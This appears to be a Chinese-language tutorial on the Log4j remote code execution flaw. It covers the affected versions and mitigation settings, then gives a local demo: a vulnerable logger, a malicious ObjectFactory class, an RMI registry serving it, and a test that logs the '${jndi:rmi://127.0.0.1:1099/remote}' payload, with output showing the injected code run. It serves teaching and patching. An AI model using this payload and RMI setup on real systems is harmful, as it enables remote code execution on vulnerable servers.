漏洞评级及影响版本
Apache Log4j远程代码执行漏洞 严重
影响的版本范围:Apache Log4j 2.x <= 2.14.1
Log4j2漏洞修复方案
升级Log4j2最新的包
https://logging.apache.org/log4j/2.x/download.html
临时解决方案
(1) 修改项目 jvm 参数:-Dlog4j2.formatMsgNoLookups=true
(2) 修改log4j2配置参数:log4j2.formatMsgNoLookups=True
(3)修改系统环境变量:FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置 为 true
Demo演示
demo地址:https://github.com/raineddown/log4j2-bug
代码演示:
1
2
3
4
5
6
7
8
9
10
11
12
13
|
public class App {
private static Logger log = LogManager.getLogger(App.class);
public void register(String username){
log.error("{},注册了账号",username);
}
}
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
public class Attack implements ObjectFactory {
static {
System.out.println("静态代码块攻击");
}
@Override
public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
System.out.println("你被攻击了");
return "【攻击者】";
}
}
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
public class Remote {
public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
Registry registry = LocateRegistry.createRegistry(1099);
Reference reference = new Reference("remote.Attack","remote.Attack",null);
ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
registry.bind("remote",referenceWrapper);
System.out.println("remote start.........");
}
}
|
攻击测试类:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
|
@Test
public void testJndi(){
try {
System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
String uri = "rmi://127.0.0.1:1099/remote";
InitialContext initialContext = new InitialContext();
Object lookup = initialContext.lookup(uri);
System.out.println(lookup);
} catch (NamingException e) {
e.printStackTrace();
}
}
@Test
public void testRegister(){
String username = "${jndi:rmi://127.0.0.1:1099/remote}";
App app = new App();
app.register(username);
}
|
测试结果:
测试资源获取
测试静态代码攻击
1
2
3
| 静态代码块攻击
你被攻击了
20:38:58.040 [main] ERROR local.App - 【攻击者】,注册了账号
|
This is copyright.